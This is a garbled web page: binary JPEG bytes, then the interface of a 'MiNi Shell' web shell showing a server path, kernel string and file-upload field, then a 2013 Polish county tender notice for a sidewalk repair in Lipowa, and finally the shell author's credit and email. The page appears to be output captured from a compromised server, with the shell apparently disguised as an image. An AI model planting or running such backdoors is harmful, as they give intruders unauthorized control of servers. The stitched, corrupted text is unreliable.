JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130816/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130816/331690-N-2013.html

<p class="kh_header"><b>Brzeg: REMONT CHODNIKA W  DRODZE  POWIATOWEJ  NR 1505 O 
                                               W  MIEJSCOWOŚCI  LIPOWA</b><br>
<b>Numer ogłoszenia: 331690 - 2013; data zamieszczenia: 16.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Brzegu , ul. Wyszyńskiego 23, 49-300 Brzeg, woj. opolskie, tel. 077 4113840, faks 077 4113845.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdpbrzeg.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT CHODNIKA W  DRODZE  POWIATOWEJ  NR 1505 O 
                                               W  MIEJSCOWOŚCI  LIPOWA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Roboty obejmują    remont  chodnika w m. Lipowa  (DP Nr 1505 O) - dł.90 mb
      z kostki betonowej  szarej o gr. 6 cm - 161,00 m2, na zjeździe z kostki betonowej 
      czerwonej o gr. 8 cm - 9,00 m2 ,wraz z odwodnieniem na długości 45,00m + 1 studnia
      kanalizacyjna i 2 wpusty drogowe i wykonaniem remontu włączenia  z masy mineralno-
      bitumicznej na skrzyżowaniu - 100,00 m2.
       Szczegółowy zakres do wykonania zawiera  kosztorys ofertowy.                                                                                                           
      Wykonanie zgodnie z obowiązującymi przepisami i normami a w szczególności , 
       specyfikacją  techniczną wykonania i odbioru robót.

W ramach  zamówienia wykonawca, oprócz robót wynikających z dokumentacji     
                projektowej Wykonawca   zobowiązany będzie  również do:

               1)opracowania projektu zmiany organizacji ruchu drogowego na czas    
                  prowadzonych robót  zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 
                  23 września 2003r.w sprawie szczegółowych warunków zarządzania ruchem 
                  na drogach oraz   wykonywania nadzoru nad  tym zarządzaniem (Dz.  U. Nr 177, 
                  poz.1729 z późn. zm.) zatwierdzony przez organ  zarządzający ruchem na drogach 
                  powiatowych  oraz jego utrzymania w trakcie prowadzonych robót
                  w należytym stanie technicznym  i  estetycznym, 
                  2)wykonania i utrzymania oznakowania w trakcie prowadzonych robót 
                     oraz rozbiórki  po  zakończeniu robót,
                 3)przestrzegania przepisów BHP,
                 4)wykonania geodezyjnej  inwentaryzacji  powykonawczej i przekazania   
                    wymaganej liczby egzemplarzy mapy zasadniczej .
 
Zaleca się, aby wykonawca dokonał wizji lokalnej terenu, którego dotyczy   
               zamówienie  oraz zdobył wszelkie informacje niezbędne do przygotowania oferty
               i podpisania  umowy.   
Utylizacja odpadów
               W trakcie wykonywania robót należy przestrzegać Ustawy o odpadach z dnia 
               27 kwietnia 2001r. i Rozporządzenia i Ministra Środowiska w sprawie katalogu 
               odpadów z dnia 12 czerwca 2001r. 
     
 Okres rękojmi  wynosi 12 miesięcy od daty odbioru końcowego.  Okres gwarancji 
               jakości  wynosi  36 m-cy. od daty odbioru końcowego.

    Podwykonawstwo

               Wykonawca może powierzyć podwykonawcy wykonanie części zamówienia, 
                niemniej powierzenie danego zakresu zamówienia podwykonawcy wymaga, 
                zgodnie z przepisem art. 647 1  KC  uprzedniej pisemnej zgody Zamawiającego.
                W takim przypadku Zamawiający wymaga wskazania w ofercie części   
                zamówienia, która będzie powierzona podwykonawcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1, 45.23.10.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)Wykonawca musi  wykazać, że  posiada doświadczenie polegające 
                               na wykonaniu (zakończeniu) w okresie ostatnich pięciu lat przed 
                               upływem terminu składania ofert, a jeżeli okres prowadzenia działalności 
                               jest krótszy - w tym okresie, co najmniej dwie roboty budowlane 
                               w zakresie budowy, przebudowy ,remontu chodnika z kostki brukowej   
                               min. 160,00 m2,o wartości brutto nie mniejszej niż 60 000,00 PLN każda  
                               (słownie:  sześćdziesiąt tysięcy  złotych 00/100), 
                               wraz z potwierdzeniem, że roboty te zostały wykonane należycie,

                            2)jeżeli wykonawca będzie wykazywał  poleganie na doświadczeniu 
                               innego podmiotu z art.26 ust.2b ustawy Pzp - to musi wykazać 
                               min. 2 roboty budowlane  jak  w  pkt.1,
                                 
                               Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów,
                               niezależnie od charakteru prawnego łączącego go z nimi stosunków. 
                               Wykonawca w takiej sytuacji zobowiązany jest przedstawić pisemne 
                               zobowiązanie tych podmiotów do udziału w realizacji zamówienia
                               w którym należy wskazać  formę udziału podmiotu trzeciego w realizacji 
                               zamówienia np.: podwykonawstwo, doradztwo, konsultacje, nadzór 
                                           lub inne, określać czego konkretnie dotyczy zobowiązanie oraz w jaki          
                                           sposób będzie ono wykonane, w tym jakiego okresu dotyczy. 

                               Zamawiający dokona oceny spełniania  tego warunku na podstawie  
                               złożonych oświadczeń/ dokumentów  na zasadzie  spełnia nie spełnia.

                              W przypadku składania oferty przez wykonawców ubiegających 
                              się wspólnie o udzielenie zamówienia, ww. warunki wymienione  mogą 
                              spełniać łącznie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, gdy Wykonawca wykaże,
                              że dysponuje lub będzie dysponował min.1 osobą pełniąca funkcje 
                              kierownika robót w specjalności drogowej z min. 3  letnim  
                              doświadczeniem na tym stanowisku od uzyskania uprawnień i złoży 
                              stosowne oświadczenie, że osoba ta posiada wymagane uprawnienia
                              o specjalności drogowej lub złoży pisemne zobowiązanie innego podmiotu 
                              do udostępnienia ww. osoby na okres korzystania z nich przy 
                              wykonywaniu zamówienia.
                        
                              W przypadku składania oferty przez wykonawców ubiegających się                 
                              wspólnie o udzielenie zamówienia, ww. warunki wymienione  mogą      
                              spełniać łącznie.
   
                              Zamawiający dokona oceny spełniania  tego warunku na podstawie  
                              złożonych oświadczeń/ dokumentów  na zasadzie  spełnia nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)OFERTA - wg załączonego wzoru do wypełnienia (zał. nr 1),
            2)KOSZTORYS OFERTOWY  - wg załączonego wzoru do wypełnienia (zał. nr 2),
   3)zaakceptowany WZÓR  UMOWY  ( zał. nr 3),
   4)karta gwarancyjna (zał. nr 4),
            5)druk  dotyczący podwykonawstwa ( załącznik nr 13),
            6)pełnomocnictwo do podpisywania oferty/reprezentacji o ile prawo do podpisywania, 
               reprezentacji nie wynika z innych dokumentów,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Termin wykonania może ulec odpowiedniemu przedłużeniu o okres, w którym roboty
   nie będą mogły być wykonywane z powodu :
   - niekorzystnych warunków atmosferycznych  uniemożliwiających prawidłowe wykonanie tych 
     robót, gdy to wynika z technologii ich wykonania ,
-działania siły wyższej (np. klęski żywiołowej, powódź, strajki)mające bezpośredni wpływ na      
  terminowość wykonywania robót.
Przedłużenie terminu wykonania umowy w przypadku wystąpienia tych okoliczności, nastąpi na podstawie pisemnego aneksu do umowy, sporządzonego na pisemny  
   umotywowany  wniosek Wykonawcy, po zaakceptowaniu go przez Inspektora Nadzoru z ramienia
   zamawiającego.
Ostateczna  wysokość  wynagrodzenia   ustalona   zostanie   na   podstawie dokonanych  obmiarów 
   powykonawczych robót  sprawdzonych przez Inspektora  Nadzoru i zatwierdzonych przez   
   Zamawiającego przy zastosowaniu cen jednostkowych zawartych w kosztorysie ofertowym   
   Wykonawcy . 
W przypadku zmiany przez władzę ustawodawczą określonej procentowej stawki podatku 
   VAT , kwota brutto wynagrodzenia zostanie aneksem do niniejszej umowy odpowiednio   
   dostosowana.
W przypadku, gdyby wynagrodzenie Wykonawcy miało przekroczyć  kwotę określoną w §3 ust.1 umowy.
   Strony mogą dokonać zmiany tej kwoty w drodze aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdpbrzeg.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych w Brzegu  49-300 Brzeg,ul.Wyszyńskiego 23, pokój nr 7.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.09.2013 godzina 10:00, miejsce: Zarząd Dróg Powiatowych w Brzegu  49-300 Brzeg,ul.Wyszyńskiego 23, pokój nr 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com